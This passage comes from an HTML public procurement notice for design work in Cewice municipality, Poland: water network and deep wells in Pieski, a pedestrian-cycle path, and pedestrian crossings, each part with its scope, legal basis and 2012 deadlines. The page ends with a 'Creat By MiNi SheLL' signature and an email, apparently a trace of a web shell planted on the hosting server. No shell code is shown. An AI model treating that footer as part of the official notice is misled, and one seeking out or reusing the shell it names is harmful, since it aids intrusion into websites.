elektronicznej 3.Wersje elektroniczne powinny być  złożone na nośniku CD lub DVD w formie zapisu PDF, JPG  do publikacji. 4.Dokumentację projektową należy opracować zgodnie z:  -Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2006 r. Nr 156, poz. 1118 z późn.zm.) -Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 120, poz.1133 ),- Ustawą z 9.06.2011 r. Prawo geologiczne i górnicze  (Dz. U. nr 163, poz. 981) - Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych określanych w programie funkcjonalno-użytkowym (Dz. U. Nr 202,poz.2072 ze zm.) 5.Kosztorys inwestorski i przedmiar robót określający planowane koszty robót budowlanych należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130, poz. 1389).6.Termin wykonania 31.10.2012 r. 7.Zaleca się, aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie projektu budowlanego i wykonawczego na budowę sieci wodociągowej i studni głębinowych w m. Pieski gm. Cewice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dane do projektowania: 1) Przebieg trasy, parametry oraz wymagania techniczne określone są w Koncepcji zaopatrzenia w wodę miejscowości Pieski, która stanowi  podstawę ramową do  opracowania projektu ,ale nie jest wiążąca dla projektanta. Koncepcja  jest własnością Zamawiającego. 2)Wykonawca, ze względu na zabudowę rozproszoną-kolonijną m. Pieski powinien rozważyć możliwość  budowy kilku studni głębinowych w celu zoptymalizowania pod względem technicznym i finansowym. 3)Projekt musi obejmować  co najmniej 2 studnie wraz z hydroforniami i stacjami uzdatniania wody, uwzględniający etapowanie inwestycji. 4)Opinia urbanistyczna dot. zabudowy  m. Pieski stanowi załącznik do niniejszego postępowania.  5)Teren nie jest objęty m.p.z.p. 2.Zakres przedmiotu zamówienia obejmuje: 1)Uzyskanie we własnym zakresie mapy do celów projektowych. 2)Uzyskanie niezbędnych map ewidencyjnych oraz wypisów z rejestru gruntów, 3)Przygotowanie dokumentów do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, decyzji o lokalizacji celu publicznego oraz pozwoleń na budowę, 4)Uzyskanie w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, decyzji o lokalizacji celu publicznego, prawomocnych pozwoleń na budowę. 5)Uzyskanie pisemnych zgód od właścicieli gruntów przez teren, których przebiegać będzie  wodociąg. Do zgód właścicieli działek ( w tym także osób prawnych), które będą podstawą złożenia oświadczeń o prawie do dysponowania nieruchomościami do celów budowlanych, należy dołączyć zestawienie zawierające imię i nazwisko (nazwę właściciela nieruchomości), nr ewidencyjny działki oraz datę uzyskania zgody właściciela działki . Zgody właścicieli nieruchomości należy uzyskać odrębnie dla każdej działki, z wyjątkiem właścicieli będących osobami prawnymi. 6)Uzyskanie warunków przyłączenia do sieci elektroenergetycznej do zasilania studni głębinowych. 7)Uzyskanie wszelkich niezbędnych warunków technicznych, opinii, uzgodnień, decyzji wymaganych przepisami Prawa  Budowlanego. 8)Badanie geologiczne gruntu w osi lokalizacji sieci wodociągowej oraz w planowanym  miejscu lokalizacji studni - w 4 egz. + 1 egz. w wersji elektronicznej  9)Opracowanie projektu robót geologicznych - w 4 egz. + 1 egz. w wersji elektronicznej 10)Opracowanie raportu oddziaływania na środowisko (jeżeli będzie wymagany)  w 4-ch egz. + 1 egz. w wersji elektronicznej 11)pracowanie operatu wodnoprawnego i uzyskanie pozwolenia wodnoprawnego w 3-ch egz. + 1 egz. w wersji elektronicznej. 12)Opracowanie następujących projektów: a)projektu budowlanego, projektu wykonawczego dla sieci wodociągowej ,  informacji BIOZ - w 5-ciu egz.+ 1 egz. w wersji elektronicznej.  b)projektu przyłącza energetycznego do zasilania studni głębinowych - w 5-ciu egz. + 1 egz. w wersji elektronicznej.
c)projektu konstrukcyjno-budowlanego budynków hydrofornii ,stacji uzdatniania wody  - w 5-ciu egz. + 1 egz. w wersji elektronicznej. d)projektu wykonawczego ze szczegółową technologią budowy studni głębinowych oraz technologii uzdatniania wody - w 5-ciu egz. + 1 egz. w wersji elektronicznej 13)Opracowanie  przedmiaru robót i kosztorysów inwestorskich po 2 egz. + 1 egz. w wersji elektronicznej . 14)Opracowanie specyfikacji technicznej wykonania i odbioru robót - w 2-ch egz. + 1 egz. w wersji elektronicznej 3.Wersje elektroniczne powinny być  złożone na nośniku CD lub DVD w formie zapisu PDF, JPG  do publikacji. 4.Dokumentację projektową należy opracować zgodnie z: -Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2006 r. Nr 156, poz. 1118 z późn.zm.)-Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 120, poz.1133 ),
-Ustawą z 9.06.2011 r. Prawo geologiczne i górnicze  (Dz. U. nr 163, poz. 981)
-Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych określanych w programie funkcjonalno-użytkowym (Dz. U. Nr 202,poz.2072 ze zm.) 5.Kosztorys inwestorski i przedmiar robót określający planowane koszty robót budowlanych należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389).6.Zaleca się, aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie projektu budowlanego na budowę ciągu pieszo-rowerowego w m. Cewice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dane do projektowania: 1)Planowany ciąg pieszo-rowerowy o długości ok. 400 m i szer. 2,5 m (od dz. 186 kościół w kierunku cmentarza - dz. 233) wzdłuż drogi wojewódzkiej nr 212. Należy uwzględnić odwodnienie i wjazdy do posesji. Proponowany przebieg ciągu pieszo-rowerowego  stanowi załącznik graficzny do niniejszego postępowania wraz ze zdjęciami terenu. 2)Wykonanie z kostki brukowej betonowej o gr. 6 cm. 2.Zakres przedmiotu zamówienia obejmuje: 1)Uzyskanie we własnym zakresie mapy do celów projektowych. 2)Uzyskanie niezbędnych map ewidencyjnych oraz wypisów z rejestru gruntów, 3)Przygotowanie dokumentów do  decyzji o warunkach zabudowy oraz pozwolenia na budowę, 4)Uzyskanie w imieniu Zamawiającego decyzji o warunkach zabudowy,  prawomocnego pozwolenia na budowę. 5)Uzyskanie pisemnych zgód od właścicieli gruntów przez teren, których przebiegać będzie ciąg pieszo-rowerowy, które będą podstawą złożenia oświadczenia o prawie do dysponowania nieruchomościami do celów budowlanych. 6)Uzyskanie wszelkich niezbędnych warunków technicznych, opinii, uzgodnień, decyzji wymaganych przepisami Prawa  Budowlanego. 7)Opracowanie projektu budowlanego dla ciągu pieszo-rowerowego ,  informacji BIOZ - w 5-ciu egz.+ 1 egz. w wersji elektronicznej.  8)Opracowanie projektu organizacji ruchu (jeżeli będzie wymagany)  - w 4-ch egz. + 1 egz. w wersji elektronicznej 9)Opracowanie  przedmiaru robót i kosztorysów inwestorskich po 2 egz. + 1 egz. w wersji elektronicznej . 10)Opracowanie specyfikacji technicznej wykonania i odbioru robót - w 2-ch egz. + 1 egz. w wersji elektronicznej 3.Wersje elektroniczne powinny być  złożone na nośniku CD lub DVD w formie zapisu PDF (tekst), JPG (rysunki)  do publikacji. 4.Dokumentację projektową należy opracować zgodnie z:  - Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn.zm.) - Rozporządzeniem Ministra Transportu i Gospodarki Wodnej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. Nr 43, poz. 430 z późn. zm) - Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz.1133 ), - Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych określanych w programie funkcjonalno-użytkowym (Dz. U. Nr 202,poz.2072 ze zm.) 5.Kosztorys inwestorski i przedmiar robót określający planowane koszty robót budowlanych należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389).  6.Termin wykonania 31.08.2012 r. 7.Zaleca się, aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej w terenie w celu zapoznawania się z stanem istniejących  drzew, krzewów, zjazdów do działek, płotów, słupów oświetleniowych itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie projektów budowlanych na przejścia dla pieszych w m. Bukowina, Popowo, Łebunia i Osowo Lęborskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Dane do projektowania 1)Lokalizację przejść dla pieszych stanowią załączniki graficzne do niniejszego postępowania 2)Projekty oprócz przejść dla pieszych, powinny zawierać rozwiązania i warunki określone przez Urząd Marszałkowski Województwa Pomorskiego oraz Starostę Lęborskiego. Pisma stanowią załączniki do niniejszego postępowania. 3)W m. Łebunia i Osowo Lęborskie , Bukowina obowiązuje m.p.z.p., teren leży w obszarze ochrony (Fragment Pradoliny Łeby i Wzgórza Morenowe na Południe od Lęborka) 2.Zakres przedmiotu zamówienia obejmuje: 1)Uzyskanie niezbędnych map do celów projektowych, ewidencyjnych oraz wypisów z rejestru gruntów, 2)Przygotowanie dokumentów do  decyzji o lokalizacji celu publicznego oraz pozwoleń na budowę lub zgłoszenia. 3)Uzyskanie w imieniu Zamawiającego decyzji o lokalizacji celu publicznego,  prawomocnych pozwoleń na budowę lub zaświadczenia o braku sprzeciwu. 4)Uzyskanie pisemnych zgód od właścicieli gruntów, które będą podstawą złożenia oświadczenia o prawie do dysponowania nieruchomościami do celów budowlanych.  5)Uzyskanie wszelkich niezbędnych warunków technicznych, opinii, uzgodnień, decyzji wymaganych przepisami Prawa  Budowlanego. 6)Opracowanie projektu budowlanego przejść dla pieszych i wymaganych chodników, peronów przystankowych  - w 5-ciu egz.+ 1 egz. w wersji elektronicznej.  7)Opracowanie projektu organizacji ruchu (jeżeli będzie wymagany)  - w 4-ch egz. + 1 egz. w wersji elektronicznej 8)Opracowanie  przedmiaru robót i kosztorysów inwestorskich po 2 egz. + 1 egz. w wersji elektronicznej . 9)Opracowanie specyfikacji technicznej wykonania i odbioru robót - w 2-ch egz. + 1 egz. w wersji elektronicznej 3.Wersje elektroniczne powinny być  złożone na nośniku CD lub DVD w formie zapisu PDF (tekst), JPG (rysunki)  do publikacji. 4.Dokumentację projektową należy opracować zgodnie z:  - Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) - Rozporządzeniem Ministra Transportu i Gospodarki Wodnej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. Nr 43, poz. 430 z późn. zm.) -Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz.1133 ), - Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych określanych w programie funkcjonalno-użytkowym (Dz. U. Nr 202, poz.2072 ze zm.) 5.Kosztorys inwestorski i przedmiar robót określający planowane koszty robót budowlanych należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389). 6.Termin wykonania 31.08.2012 r. 7.Zaleca się, aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com